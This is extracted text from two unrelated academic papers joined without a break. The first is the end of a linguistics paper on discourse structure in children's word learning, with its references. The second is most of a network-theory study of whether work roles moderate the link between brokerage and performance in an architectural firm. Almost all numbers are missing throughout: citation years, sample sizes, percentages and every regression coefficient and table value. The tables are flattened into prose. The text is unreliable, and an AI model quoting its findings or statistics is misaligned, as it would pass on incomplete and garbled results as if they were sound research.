discourse structure could facilitate children’s language acquisition. in ad- dition, we investigate the interaction between dis- course structure and social cues, both important and complementary sources of information in lan- guage learning (baldwin, ; frank et al., ). we also examined why individual children’s gaze was an important predictor of reference in previ- ous work (johnson et al., ). using ablation tests, we showed that information provided by the child’s gaze is still valuable even in the presence of discourse continuity, supporting the hypothesis that parents “follow in” on the particular focus of chil- dren’s attention (tomasello and farrar, ). lastly, we showed that our models can produce accurate discourse segmentations. our system’s out- put is considerably better than the raw topic anno- tations provided in the previous social cue corpus (frank et al., ) and is in good agreement with discourse topics assigned by human annotators in frank and rohde (under review). in conclusion, although previous work on grounded language learning has treated individual utterances as independent entities, we have shown that the ability to incorporate discourse information can be quite useful for such problems. discourse continuity is an important source of information in children language acquisition and may be a valuable part of future grounded language learning systems. acknowledgements we thank the tacl action editor, mark steed- man, and the anonymous reviewers for their valu- able feedback, as well as chris manning for helpful discussions. this research was supported under the australian research council’s discovery projects funding scheme (project numbers dp and dp ). references alfred v. aho and jeffery d. ullman. . the the- ory of parsing, translation and compiling; volume : parsing. prentice-hall, englewood cliffs, new jersey. yoav artzi and luke s. zettlemoyer. . weakly su- pervised learning of semantic parsers for mapping in- structions to actions. transactions of the association for computational linguistics, : – . john aycock and r. nigel horspool. . practical ear- ley parsing. the computer journal, ( ): – . lalit r. bahl, frederick jelinek, and robert l. mercer. . a maximum likelihood approach to continu- ous speech recognition. ieee transactions on pattern analysis and machine intelligence, ( ): – . james k. baker. . trainable grammars for speech recognition. the journal of the acoustical society of america, (s ):s . jason baldridge and alex lascarides. . proba- bilistic head-driven parsing for discourse structure. in conll. dare a. baldwin. . infants’ ability to consult the speaker for clues to word reference. journal of child language, : – . regina barzilay and mirella lapata. . collective content selection for concept-to-text generation. in hlt-emnlp. doug beeferman, adam berger, and john lafferty. . statistical models for text segmentation. ma- chine learning, ( - ): – . benjamin börschinger, bevan k. jones, and mark john- son. . reducing grounded learning tasks to gram- matical inference. in emnlp. s. r. k. branavan, harr chen, luke s. zettlemoyer, and regina barzilay. . reinforcement learning for mapping instructions to actions. in acl-ijcnlp. malinda carpenter, katherine nagell, michael tomasello, george butterworth, and chris moore. . social cognition, joint attention, and com- municative competence from to months of age. monographs of the society for research in child development, ( ). david l. chen and raymond j. mooney. . learning to sportscast: a test of grounded language acquisition. in icml. david l. chen, joohyun kim, and raymond j. mooney. . training a multilingual sportscaster: using per- ceptual context to learn language. journal of artificial intelligence research, : – . james clarke, dan goldwasser, ming-wei chang, and dan roth. . driving semantic parsing from the world’s response. in conll. jay earley. . an efficient context-free parsing algo- rithm. communications of the acm, ( ): – . vanessa wei feng and graeme hirst. . text-level discourse parsing with rich linguistic features. in acl. katherine forbes, eleni miltsakaki, rashmi prasad, anoop sarkar, joshi aravind, and bonnie webber. . d-ltag system: discourse parsing with a lexical- ized tree adjoining grammar. journal of logic, lan- guage and information, : – . michael c. frank and hannah rohde. under review. markers of topical discourse in child-directed speech. michael c. frank, noah d. goodman, and josh b. tenen- baum. . a bayesian framework for cross- situational word-learning. advances in neural infor- mation processing systems . michael c. frank, joshua b. tenenbaum, and anne fernald. . social and discourse contributions to the determination of reference in cross-situational word learning. language learning and development, ( ): – . jianfeng gao and mark johnson. . a comparison of bayesian estimators for unsupervised hidden markov model pos taggers. in emnlp. dan goldwasser and dan roth. . learning from natural instructions. in ijcai. dan goldwasser, roi reichart, james clarke, and dan roth. . confidence driven unsupervised semantic parsing. in acl. peter gorniak and deb roy. . situated language understanding as filtering perceived affordances. cog- nitive science, ( ): – . hugo hernault, helmut prendinger, david a. duverle, and mitsuru ishizuk. . hilda: a discourse parser using support vector machine classification. di- alogue and discourse, ( ): – . jerry r. hobbs. . literature and cognition. csli lecture notes . liang huang and kenji sagae. . dynamic program- ming for linear-time incremental parsing. in acl. frederick jelinek and john d. lafferty. . compu- tation of the probability of initial substring generation by stochastic context-free grammars. computational linguistics, ( ): – . mark johnson, katherine demuth, and michael frank. . exploiting social information in grounded lan- guage learning via grammatical reduction. in acl. mark johnson. . pcfgs, topic models, adaptor gram- mars and learning topical collocations and the struc- ture of proper names. in acl. joohyun kim and raymond j. mooney. . unsu- pervised pcfg induction for grounded language learn- ing with highly ambiguous supervision. in emnlp- conll. joohyun kim and raymond j. mooney. . adapting discriminative reranking to grounded language learn- ing. in acl. alistair knott and ted sanders. . the classification of coherence relations and their linguistic markers: an exploration of two languages. journal of pragmatics, ( ): – . kenichi kurihara and taisuke sato. . an appli- cation of the variational bayesian approach to proba- bilistic contextfree grammars. in ijcnlp workshop beyond shallow analyses. kenichi kurihara and taisuke sato. . variational bayesian grammar induction for natural language. in icgi. tom kwiatkowski, luke s. zettlemoyer, sharon gold- water, and mark steedman. . inducing proba- bilistic ccg grammars from logical form with higher- order unification. in emnlp. alex lascarides and nicholas asher. . temporal interpretation, discourse relations, and common sense entailment. linguistics and philosophy, ( ): – . joop m. i. m. leo. . a general context-free parsing algorithm running in linear time on every lr(k) gram- mar without using lookahead. theoretical computer science, ( ): – . roger levy. . expectation-based syntactic compre- hension. cognition, ( ): – . percy liang, michael i. jordan, and dan klein. . learning semantic correspondences with less supervi- sion. in acl-ijcnlp, pages – . percy liang, michael i. jordan, and dan klein. . learning dependency-based compositional semantics. in association for computational linguistics (acl). ziheng lin, hwee tou ng, and min-yen kan. . a pdtb-styled end-to-end discourse parser. natural lan- guage engineering, firstview: – . wei lu, hwee tou ng, wee sun lee, and luke s. zettle- moyer. . a generative model for parsing natural language to meaning representations. in emnlp. william c. mann and sandra a. thompson. . rhetorical structure theory: toward a functional the- ory of text organization. text, ( ): – . daniel marcu. . the rhetorical parsing of natural language texts. in acl. daniel marcu. . a decision-based approach to rhetorical parsing. in acl. lev pevzner and marti a. hearst. . a critique and improvement of an evaluation metric for text segmen- tation. computational linguistics, ( ): – . livia polanyi, chris culy, martin van den berg, gian lorenzo thione, and david ahn. . a rule based approach to discourse parsing. in sigdial. hoifung poon and pedro domingos. . unsuper- vised semantic parsing. in emnlp. lawrence r. rabiner. . a tutorial on hidden markov models and selected applications in speech recognition. remko scha and livia polanyi. . an augmented context free grammar for discourse. in coling. jeffrey m. siskind. . a computational study of cross-situational techniques for learning word-to- meaning mappings. cognition, ( - ): – . benjamin snyder and regina barzilay. . database- text alignment via structured multilabel classification. in ijcai. radu soricut and daniel marcu. . sentence level discourse parsing using syntactic and lexical informa- tion. in naacl. andreas stolcke. . an efficient probabilistic context-free parsing algorithm that computes prefix probabilities. computational linguistics, ( ): – . rajen subba and barbara di eugenio. . an effec- tive discourse parser that uses rich linguistic informa- tion. in naacl. stefanie tellex, thomas kolla, steven dickerson, matthew r. walter, ashis g. banerjee, seth teller, and nicholas. roy. a. approaching the symbol grounding problem with probabilistic graphical mod- els. ai magazine, ( ): – . stefanie tellex, thomas kolla, steven dickerson, matthew r. walter, ashis g. banerjee, seth teller, and nicholas roy. b. understanding natural lan- guage commands for robotic navigation and mobile manipulation. in aaai. michael tomasello and michael jeffrey farrar. . joint attention and early language. child development, pages – . adam vogel and daniel jurafsky. . learning to fol- low navigational directions. in acl. yuk wah wong and raymond j. mooney. . learn- ing synchronous grammars for semantic parsing with lambda calculus. in acl. chen yu and dana h. ballard. . on the integration of grounding language and learning objects. in aaai. chen yu and dana h ballard. . a unified model of early word learning: integrating statistical and social cues. neurocomputing, ( ): – . luke s. zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured classification with probabilistic categorial grammars. in uai. michael zettlemoyer, luke s.and collins. . online learning of relaxed ccg grammars for parsing to log- ical form. in emnlp-conll. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). connections issue | vol. article | doi: . /connections- . the contingent effect of work roles on brokerage in professional organizations anssi smedlund ,* and emily w. choi finnish institute of occupational health, helsinki, uusimaa. naveen jindal school of management, the university of texas at dallas, texas, tx. *e-mail: anssi.smedlund@ttl.fi abstract in this paper, we consider whether brokerage in an intra- organizational communication network and type of work role interact to predict individual performance in a professional organization. the independent–interdependent nature of work roles is considered a key factor in structural contingency theory, but is yet to be studied in relation to brokerage. we propose that a brokerage position has a joint effect on performance along with work role in a study of organization-wide communication network in an architectural firm with employees. our analysis suggests an association between brokerage and role-prescribed performance for individuals in both interdependent and independent types of work roles. our findings also suggest that interdependent roles requiring broad, organization- wide collaboration, and communication with others, brokerage is positively associated with the performance prescribed by the role, but for independent roles, wherein collaboration and communication are somewhat limited by the formal role, brokerage has far less of an effect. our findings contribute to brokerage theory by comparing how brokerage affects performance in two distinct work roles by illustrating how the benefits of brokerage seem more restricted to those in interdependent work roles. the contribution of this paper is to suggest the independent–interdependent nature of work role as a boundary condition for brokerage. keywords network theory, brokerage, formal organization, informal organization, work role, interdependency brokerage theory is probably one of the most influential lines of thought in network theory. since burt’s ( ) seminal book, brokerage has been studied and associated with numerous organizational advantages for an individual, such as higher salary and faster promotion, based on the benefits of having better access to information and greater control over other actors than their more socially constrained colleagues (burt, ). while brokerage generally provides benefits, some studies have found that under context-specific conditions, there may not always be positive effects (e.g. barnes et al., ; burt, ; fleming et al., ). therefore, as the empirical results are mixed, the contingencies and boundary conditions for brokerage merit further research. an important, but generally overlooked boundary condition in structural network analysis is the independ- ent–interdependent nature of work roles, even though interdependency has been widely used as a modera- tor in general management studies and is at the core of structural contingency theory (thompson, ). inter- dependence regulates how much ind ividuals can com- municate and collaborate with others to perform their work effectively (cummings, ; wang et al., ), and is one of the most important factors influencing team performance in organizations (langfred, ; the contingent effect of work roles on brokerage in professional organizations saavedra et al., ). in structural contingency the- ory, numerous dimensions of interdependence, such as pooled, sequential, or reciprocal types, have been distinguished based on exchange of information or re- sources (thompson, ). this empirical study considered how the benefits of brokerage are contingent on the independent– interdependent nature of the work role. that is, how the informal organization, operationalized as the intra- organizational communication network structure, corresponds with the formal work role for performance. the novelty and value in this approach is that when the formal and informal organizations have been linked to performance outcomes as such, their effects on each other have not been linked so often in the literature (mcevily et al., ). following the structural contingency theory logic to test the formal work role’s effect as a boundary condition for brokerage, our paper explores whether work role moderates brokerage effect on performance in professional organizations. drawing from the nature of work at our case architectural firm, our hypothesis is developed on the starting point that work in a professional organization is generally anchored on either independent or interde- pendent tasks and work roles are formed accordingly. both independent and interdependent roles prompt role-prescribed performance expectations due to the division of labor: professionals typically work in inte- llectually demanding projects, requiring them to focus their energy on the highly demanding ope rative work, simultaneously creating demand for interdependent roles to manage the projects and the supporting organizations (cf. etzioni, ; weber, ). thus, the formal work role not only limits interdependence for the professionals, but also assumes managers to adopt the interdependent role to communicate and collaborate broadly across the organization. in this paper, we hypothesize that when brokerage and role-prescribed performance are aligned, individuals perform best. our data are derived from a communication network study of an architectural firm of employees, of which were classified as working mainly in either independent (n = ) or interdependent (n = ) roles. we chose to study this specific architectural firm as a typical professional organization because the firm had clearly distinguished work roles for the independent professional architects and interdependent managers . in our analysis, we examined the moderating effect of work role in the association between brokerage and role-specific individual performance. role-specific performance involved an objective measure of either billable hours for the professional architects (i.e. independent work role) or a peer evaluation score of managers as promoter of ideas (i.e. interdependent work role). our study contributes to the underlying assump- tions about the effects of brokerage. despite a few negative reports from the literature (e.g. barnes et al., ; fleming et al., ), the general understanding about brokerage is that it benefits the individual in most circumstances. in this regard, our study contributes to brokerage theory by pointing out an important contingency of work role. in practical terms, our findings imply that independent professionals, such as architects, do not seem to benefit so much from networking and bridge building, since these are less related to their role-prescribed performance. in the context of management theory, our study contributes to a better understanding of the interplay of formal and informal organizations. these two topics have historically remained separate and unconnected (mcevily et al., ) but have spurred number of integrative studies (biancani et al., ; kleinbaum et al., ; soda and zaheer, ; srivastava, ). by treating work role as a moderator in molding the association between brokerage and performance, we address the gap in the literature on the topic by extending structural network analysis with contingencies (adler and kwon, ; carnabuci and oszegi, ; cross and cummings, ; hansen, ; mehra et al., ). by doing this, we increase the explanatory power of structural analysis (lincoln, ; cf. lincoln and miller, ), resulting as an increased knowledge of how informal network position is associated with role- prescribed performance. contingent effect of work role on the relationship between brokerage and performance the basic tenet of our study is that there are, on the whole, fundamental differences in the communication and cooperation requirements between independent and interdependent work roles. according to classi- cal management theory, work roles outline a kind of bureaucratic boundary for social relationships that individuals can and should adhere to and engage in within their organization – when an individual is assigned a certain role, then the communication network becomes somewhat inherited and defined the organization’s work role structures and innovation ac- tivities were studied extensively at two-year research project with theme-based interviews and several workshops. the results are reported at a phd thesis (tuominen, ). connections by the role (hansen and haas, ; lincoln and miller, ; mcevily et al., ; merton, ; weber, ). over time, individuals develop informal networks largely corresponding the role-prescribed relationships (lincoln and miller, ; padgett and ansell, ), but the networks reach beyond the formal bureaucratic boundaries as individuals communicate freely across the organization (krackhardt, ). in addition to communication, formal division of labor and corresponding roles also affect expected performance. previous research has noted that a work role defines what types of activities an individual performs, prompts normative expectations in an organization, and sets the standard for how performance is evaluated (biddle, ; katz and kahn, ; welbourne et al., ). in the most extreme cases, performance that is not prescribed by the work role is prohibited and only the type of performance established for the role is rewarded (pfeffer and salancik, ). conceivably because performance expectations are strongly determined by the work role, a notable body of research studies specifically considers work role performance, and the conditions to manage and maximize it (griffin et al., ; leroy et al., ). work roles having a contingent effect on the relationship between brokerage and performance can be analyzed using structural contingency theory combined with the conception of organization as a socio-technical system. as a socio-technical system, professional organization is a combination of social, interpersonal communication networks, and technical roles specified by the formal division of labor, wherein the formal aspects interact with the social aspects of performance (cummings, ). from this perspective, work role is derived from technology and corresponds with thompson’s ( ) pooled task interdependence for independent work and reciprocal task interdependence for interdependent work. in the former category, rules and standard procedures provide enough coordination for the individuals and teams to work independently toward a common goal, and in the latter category, the coordination mechanism involves a mutual adjustment, as the work is performed together to produce the output. specifically, the independent– interdependent nature of work has been a key focus of research related to team performance (cummings, ; langfred, ; wang et al., ). in these studies, interdependence is built-in to the work the team performs, and then treated as a moderator of aspects such as group autonomy, collective efficacy, group potency, organizational citizenship or diversity for several different types of outcomes (bachrach et al., ; langfred, , ; stajkovic et al., ; wang et al., ). notable in the results of these studies is the support for the mechanisms derived from thompson’s ( ) theory that demonstrate that the need for communication and cooperation increases along with an increase in the task interdependency, complexity of goals and feedback (saavedra et al., ). in professional organizations, these dimensions become increasingly complex amid higher positions in formal hierarchy simply because managers tend to have increasingly broader job descriptions than their subordinates and participate in a larger number of overlapping projects of various kinds. typically, managers are experienced professionals in their field, and they perform some of the client project work in addition to fulfilling the expectations toward sales, organizational development and coordinating activities in their departments or other work units (e.g. etzioni, ). a manager’s goals are in this respect defined from both above and below their hierarchical position, and they receive feedback for their work from several others aside from their immediate colleagues. in contrast, professionals are technical specialists, and performing their job well generally requires spending more time at their desks working on specific projects, thus having inherently higher independence incorporated in their work roles, even if their project may require combining several individual’s work. table summarizes how professionals and managers differ in terms of interdependency based on the dimensions identified by saavedra et al. ( ). a brokerage position in a communication network of interdependent work roles can provide a major boost to effective communication and cooperation. studies show that brokerage provides the best position to coordinate work across other areas of a work communication network (burt, ; granovetter, ) and increases the ability to convey ideas across the organization to the distant individuals in the network (reagans and mcevily, ). brokerage also increases the chances that an individual’s activities are to be considered and engaged by others, and concomitantly, to be judged valuable (burt, ). in general, brokerage means less structural constraint, more diversity, and weaker ties (aral and van alstyne, ), and allows individuals to benefit from non-redundant sources of knowledge (hansen, ). the more interdependent the work role is, the greater the need for brokerage in a professional organization. our hypothesis evaluates how brokerage in the communication network and the contingent effect of work roles on brokerage in professional organizations independent–interdependent work roles interact with each other: h . work role moderates the relationship between brokerage and role-prescribed performance such that the contribution of brokerage is stronger when the work role is interdependent compared to independent. methods data we tested our hypotheses using data collected in an architectural firm during a two-year study. we collected questionnaire and timesheet data from employees who participated in client projects residing in the same open office and who were employed during the first and second years of the study (n = ). to control for common method variance and develop a causal argument on the network positions and performance, the data on dependent variables were collected in the second year of the study from time sheets and from an additional online survey. in total, there were employees at the start of the study and the remaining employees worked at other physical locations, left the company or belonged to administrative staff (e.g. information system administration and payroll). there were five formal roles: professionals, project managers, senior project managers, and managing partners. the professional architects were coded as independent roles (n = ) and all manager roles were coded as interdependent roles (n = ). the professionals performed different aspects of design and drawings, and managers attended to sales, project management, and development. based on interviews about work roles and innovative activities at the case company reported by tuominen ( ), the professionals were clearly a distinct group from the managers and were allowed to focus mainly on their solitary architectural design work. conversely, managers were given broad responsibilities in managing work units and engaged in development and innovation. the case firm invested heavily in innovation and development and just before the beginning of our data collection, promoted several individuals previously working as professional architects to project managers. both work roles required talent and extensive training in architectural design, but they differed in communication patterns, the managers have to communicate across the firm to participate in and supervise several development projects. a total of % of the sample were women, and % had a master’s degree in architecture, which table . differences between independent and interdependent work roles in a professional organization. independent roles in a professional organization interdependent roles in a professional organization typical formal role professional manager task interdependency client projects of several sequential and parallel tasks to be worked on alone and coordinated within the project team supervision over work units, selling, negotiating, and participating in several client projects. member of business development and strategy development teams goal interdependency client project provides clear goals for each individual and for compiled output of project several goals coming from projects, firm, and clients feedback interdependency individuals receive feedback from colleagues working on the same project. collective feedback provided by superior and client during and after project feedback from the subordinates, from clients and from top management. feedback from several projects requirements for collaboration and coordination lower higher connections is minimal required training for certified architects. the remaining % had a bachelor’s degree or vocational degree in related design field. the average tenure was . years (sd = . ) for managers and . years (sd = . ) for professionals. measures dependent variables we used billable hours from clients as a dependent variable of the role-prescribed performance for the independent work roles. this was constructed based on time sheets, where the employees had allocated their working time in a variety of categories. we chose billable hours from the client category as a performance measure of independent work roles, because the firm aimed at maximizing it, and it was directly linked to annual profit. we calculated a monthly mean of the number of billable hours to generate a uniform variable to describe individuals’ average performance through the year. monthly mean billable hours for interdependent roles were . (sd = . ) and for independent roles . (sd = . ). the variable was normalized with second power transformation to adjust its skew. for the variable describing role-prescribed performance for interdependent work roles, we chose promoting of new ideas. following the survey examples from wasserman and faust ( ), the variable was constructed from a questionnaire in which the respondent was asked to name five individuals in the firm who promote new ideas. each nomination received one point, and points were summed resulting in a count variable of interdependent work roles’ performance. this procedure was chosen, because it provides a single component measure of a person’s perceived competence and ability to put forth actions in the organization that will eventually lead to innovation (march, ). this measure also corresponds with the current understanding of creativity that highlights the generation of both novel and useful ideas (amabile, ) and provides a measure to identify those individuals who are both coming up with ideas and promoting them. the variable was normalized with square root transformation to adjust its skew. independent variables the network data consisted of information on self-reported social ties in three types of work- related communication collected through an online sociometric survey instrument in the first year of study. preliminary interviews consistently identified three types of informal, work-related interaction among employees that we distinguished in our survey: communication about the (i) day-to-day architectural design work, (ii) innovative new ideas, and (iii) business development. the network data were obtained from a free-choice survey with two-way directed questions, wherein giving-information-to and getting-information- from components of communication were asked separately (wasserman and faust, ). thus, three network survey question pairs were used: one for communication about the day-to-day architectural design work, one for innovative new ideas, and one for business development. the wording of the questions were tailored to reflect the conditions of the company based on the interviews, and were checked with one of the supervisors before publishing the survey online. a one-sentence example was given in all three types of communication. communication about the day-to- day architectural design work was defined as relating to the output delivered to clients that was recurring and was in the realm of respondent’s line of expertise. communication for innovative new ideas was defined as work-related ideas that the respondent was not aware of anyone else proposing previously. business development communication was defined as com- munication about improvements in pre-existing products or services, or internal company process or personal work practices. the response rate was % for the questions about communication in day-to-day architectural design work and business development tasks and % in communicating innovative new ideas. in the online survey, the network questions were presented after a filtering question wherein the employees had defined their own acquaintances from a roster of all employee names. small organization size permitted a full roster method, which rules out recall bias thus increasing reliability of the network measures (marsden, ). separating giving-and-getting components of communication further increases psychometric reliability by allowing confirmation of each social tie (krackhardt, ). the frequency scale in communication was set to choices of ( ) daily, ( ) weekly, ( ) once a month, ( ) less than once a month, or ( ) = not at all. we transposed the getting-information-from component in each of network question pairs, and joined the resulting two networks together, by using the value of the giving-information component as communication frequency resulting in confirmed communication ties between individuals. before generating the brokerage measures, we combined the contingent effect of work roles on brokerage in professional organizations the three networks by summing up the frequencies, then dichotomizing at the mean frequency (min = , max = , mean = . , sd = . ). brokerage our first brokerage measure was the additive inverse of burt’s constraint (burt, ). first, we generated burt’s constraint with ucinet vi structural holes routine limiting the measure to consider only an individual’s contacts’ ties and using both outgoing and incoming ties. then we generated our brokerage measure by calculating minus constraint, following recent network studies (carnabuci and oszegi, ; soda et al., ). thus, the higher the resulting brokerage measure is, the more brokering opportunities the individual has. in other words, our measure indicates how an individual’s communication is concentrated in non-redundant contacts in groups of connected colleagues, because the less constrained actors are connected to more groups of others (burt, ). in our analysis, the higher the additive inverse of burt’s constraint, the better opportunities for brokerage the individual has. as the second brokerage measure, we used betweenness centrality (freeman, ) generated with stata function “nwcommands”. we added betweenness centrality to the measures, because it has been frequently used as an additional brokerage measure (e.g. fang et al., ). independent work role we created a dummy variable to distinguish between independent and interdependent roles. all individuals in any of the manager roles (n = ) were coded as interdependent ( ) and all individuals in professional architect roles (n = ) were coded as independent ( ). control variables we requested that the human resource manager of the company to provide us with demographic data of the employees. from that data, we created the control variables for organizational tenure, gender, and education to be used in our models because they were found to be significant in earlier studies of network positions and various outcome variables (reagans and mcevily, ; reagans and zuckerman, ). language skills and age were also considered in evaluating the modeling strategy, but these variables did not increase the explanatory power of the models and were dropped. individuals were very homogeneous in terms of language skills, and age was highly correlated with tenure. there were six divisions in the firm specializing in certain types of architectural projects, for example, office buildings or shopping malls. we checked for an intraclass correlation (icc) between the units to determine whether unit affiliation is a considerable source of variance in performance and did not find justification for hierarchical models. results table presents bivariate correlations and descriptive statistics of the variables. dependent variables and work role are numbered to , followed by control variables and brokerage measures. we found table . means, standard deviations, and correlations. variable mean sd billable hours . . promoting new ideas . . − . ** independent work role . . . * − . ** tenure . . − . . − . ** female . . . − . . − . master’s degree . . − . . − . ** . − . inverse of burt’s constraint . . − . . ** − . ** . * − . ** . betweenness centrality . . − . ** . ** − . * . − . * . . ** notes: *p < . ; **p < . . connections a positive correlation between both brokerage measures and idea promotion. the number of billable hours negative correlation is significant with betweenness centrality, but not with the inverse of burt’s constraint. the independent role (i.e. = independent, = interdependent) correlates positively with the number of billable hours and negatively with idea promotion, which supports the assumption of distinct output expectations between the work roles. having a master’s degree and tenure correlate negatively with independent work role, indicating that those in interdependent work roles have higher education and higher tenure than independent roles. both brokerage measures are positively intercorrelated as expected. we z-standardized all independent variables to facilitate better interpretation of the moderation effect as suggested by dawson ( ). tables and present the results of the regression analyses testing the association between the inverse of burt’s constraint, betweenness centrality, promoting new ideas, and billable hours. as postestimation of the models showed heteroscedasticity of the residuals caused by slight non-normality of the transformed dependent variables, we used robust standard errors to control for this, as suggested by antonakis and dietz ( ). ols regression was chosen because it has been considered a valid modeling strategy when network measures are included as independent variables (e.g. reagans and mcevily, ; srivastava, ). however, the network measures violate the independence of observations, which is one of the key assumptions of ols regression resulting as underestimating of standard errors and over-rejecting of hypotheses (srivastava, ). to correct this, we chose a procedure suggested by borgatti et al. ( ) and compared the results of our conventional ols models with those obtained from ucinet vi node- level regression, which uses the ols regression to generate the coefficients, but permutation technique for the p-values. as both modeling techniques are presented side by side in tables and , it can be observed that the permutation technique generally results in higher t-values for those coefficients that are statistically significant, providing additional support for our results. our hypothesis about the work role’s boundary effect on brokerage means that brokerage is associated with higher work role-prescribed per- formance, if the role is interdependent. in other words, as employees in interdependent work roles are expected to engage in promoting new ideas in the organization, they benefit from brokerage. to test this aspect of the hypothesis, we first examined the table . results of conventional and node-level ols regression analysis for promoting new ideas (t-values in parentheses). promoting new ideas model conventional ols model permutation ols model conventional ols model permutation ols independent work role − . (− . ) − . (− . ) − . (− . )** − . (− . )** tenure . ( . ) . ( . ) . ( . ) . ( . ) female . ( . ) . ( . ) . ( . ) . ( . ) master’s degree . ( . ) . ( . ) . ( . ) . ( . ) inverse of burt’s constraint . ( . )** . ( . )** independent × inv. of burt’s constraint − . (− . )** − . (− . )** betweenness centrality . ( . )** . ( . )** independent × betweenness − . (− . ) − . (− . ) constant . ( . )** . (na) . ( . )** . (na) r . . . . n note: **p < . . the contingent effect of work roles on brokerage in professional organizations table . results of ols and node-level regression analysis for billable hours (t-values in parentheses). billable hours model conventional ols model permutation ols model conventional ols model permutation ols independent work role . ( . ) . ( . ) . ( . )* . ( . )* tenure . ( . ) . ( . ) . ( . ) . ( . ) female . ( . ) . ( . ) . ( . ) . ( . ) master’s degree . ( . ) . ( . ) . ( . ) . ( . ) inverse of burt’s constraint − . (− . )* − . (− . )* independent × inv. of burt’s constraint . ( . )** . ( . )* betweenness centrality − . (− . ) − . (− . ) independent × betweenness . ( . ) . ( . ) constant − . (− . ) − . (na) − . (− . ) − . (na) r . . . . n notes: *p < . ; **p < . . main effects of the inverse of burt’s constraint and betweenness centrality and then their interactions with independent versus interdependent work role. according to the main effects of the brokerage measures in models to in table , brokerage is associated with higher scores for promoting new ideas. when examining the significant interaction effect of the work role in the models and in table , it is evident that employees in interdependent roles benefit from brokerage more than those in independent roles for promoting new ideas. for example in models and , the positive effect of the inverse of burt’s constraint for interdependent work roles is . and for independent work roles, the effect is . − . = . . further, according to our hypothesis, for inde- pendent work roles, brokerage should have less effect on role-prescribed performance than for interdependent roles. in table , brokerage is modeled with billable hours, which is the role-prescribed performance measure for independent work roles. the main effects of models and in table indicate that brokerage is negatively associated with billable hours. the interaction effect of the work role in model shows that the negative effect of the inverse of burt’s constraint for interdependent work roles is − . and for independent work roles, the effect is − . − . = − . . this shows that higher brokerage is associated with lower role-prescribed performance for independent roles. according to the main effects of the models presented in tables and , brokerage seems to be associated with higher performance in idea promotion and lower performance in billable hours, despite work role. however, in order to distinguish the work role-specific effects, further examination is needed. for this purpose, we examined the interactions by studying the simple slopes, which is a procedure in probing the interaction patterns (dawson, ). after generating the significances of the simple slopes for interactions of the models with the inverse of burt’s constraint and betweenness centrality for both promoting new ideas and billable hours (models , , , and in tables and ) with stata’s “margins” procedure (table a ), we confirmed the hypothesis. for promoting new ideas, the coefficients of the simple slopes were statistically significant and positive for interdependent roles with both brokerage measures. betweenness centrality was positive and significant also for independent roles, suggesting that brokerage is also associated with independent professionals in promoting their ideas. this was the case for the independent professionals in our study connections who were not expected to promote new ideas, which was evident because professionals out of received zero nominations as promoters of new ideas. notably, for interdependent roles, brokerage is associated with lower number of billable hours. discussion our study adds knowledge on the relation of brokerage to performance and improves the empirical understanding of how formal organization is related to the informal. in our case organization, our finding is that brokerage is associated with higher role- prescribed performance for those in interdependent roles, but not for those in independent roles. therefore, our findings show that work role is a contingency, a boundary condition for brokerage. as brokers are bridging structurally distinct groups (adler and kwon, ; burt, , ; reagans and mcevily, ), brokerage correlates with managerial performance in our empirical setting but does not have an association with independent professional’s performance measured with the amount of billable hours. theoretical contributions by presenting work role as a boundary condition for brokerage, this paper makes several contributions to theory. first, the study complements earlier studies on the interplay of formal and informal organization (biancani et al., ; kleinbaum et al., ; soda and zaheer, ; srivastava, ). our results show that formal and informal structures reinforce each other, as proposed by mcevily et al. ( ) as one interaction mechanism between the formal and informal structures. second, the study complements the contingency perspective on network theory. the network theory’s structuralist argument suggests a direct causal link from brokerage to performance (e.g. emirbayer and goodwin, ; mayhew, ), traditionally giving less attention to contingencies. this has probably led to underrepresentation of network studies taking moderators such as work roles into account, only with few exceptions (ahuja et al., ; brass, ; burt, ; ibarra and andrews, ), and only quite recently, the individual attributes as contingencies have been consistently included in network studies (landis, ). therefore, this study contributes to most brokerage literature that seems to imply that brokerage position benefits the broker, and sometimes but not always the network, all the time under all circumstances. our study provides empirical evidence that suggests that it is in the role of managers to broker relations and communication among the horizontally and vertically differentiated units and employees for which they have responsibility. our study suggests that formal work role not only greatly influences the performance targets, but also limits the advantage of brokerage to the behavior prescribed by the work role only for interdependent work roles. the strength of our study is in its organization- wide approach. we obtained network data from the entire population of employees in the firm with a particularly detailed survey questionnaire backed up with qualitative interviews. we separately surveyed giving-and-getting types of informal work-related communication ties enabling improved accuracy in examining brokerage. this so-called whole-network approach increases the validity of the brokerage measures used in the models (borgatti et al., ). the second strength of our study is that it measured the role-prescribed performance with objective performance data: independent work role’s performance with billable hours from the time sheets and interdependent role’s performance with peer evaluations of idea promotion. by doing so, we complement the studies that have connected organization-wide networks and work performance (brass, ; carboni and ehrlich, ; cross and cummings, ; mehra et al., ; sparrowe et al., ). limitations and future research despite its contributions, this study has several limitations providing motivation for further research. the first one concerns the case study character of our study. our data were gathered from one firm, which limits the generalizability of the results. yet, we were able to collect detailed survey, timesheet, and demographic data about the individuals working in the firm, resulting in organization-wide, bounded network data with the dependent variables that were meaningful proxies for performance. confirming with the interviews and reviewing the self-reported job descriptions of professionals and supervisors, we concluded that the architect office seems like so many professional organizations, where work requires both high talent and extensive training, and where managers have professional backgrounds. the architects are regulated by a national regulatory agency with certification exams, and most of the individuals we studied were certified architects, thus the professional’s work in the firm was similar compared to firms in the same industry. the firm was well established in its market, and the employee the contingent effect of work roles on brokerage in professional organizations turnover was relatively low providing prerequisites for established communication network structures and divisions of labor between the work roles. the second limitation is the reverse causality caused by common method variance, which is the usual limitation discussed in survey-based network studies (e.g. carboni and ehrlich, ; sparrowe et al., ). we addressed common method variance by constructing our network variables from the first year of study and used the dependent variables from the second year. according to the assumptions of the structuralist approach of network theory, we assumed the causality of brokerage predicting performance in our research design. our approach speaks to this causality, but as the communication network structures may take time to develop and become rigid, we are still left with a concern of reverse causality in which performance leads to structural advantage to some extent. this may be the case with the employees in interdependent roles, since brokerage was, as expected, associated with a higher idea promoter score, and promoters have a tendency to become central individuals (obstfeld, ; scott, ), making our idea promoter dv actually a measure of prestige. nevertheless, becoming prestigious in a professional organization arguably requires brokerage between others, so we are certain to have captured the right phenomenon with our measure of idea promotion. the third limitation is related to alternative explanations on the mechanisms of why the nature of work role moderates brokerage. our argumentation developed around thompson’s ( ) idea of more independent roles (e.g. professional architects in our case) requiring less collaboration and coordination, thus benefiting less from brokerage is in line with previous research. however, differences in legitimacy between professional architects and managers would provide an alternative explanation for our hypothesis in our data. for example, burt ( ) shows that women do not benefit from brokerage unless they have a more senior mentor as a sponsor, and argues that this 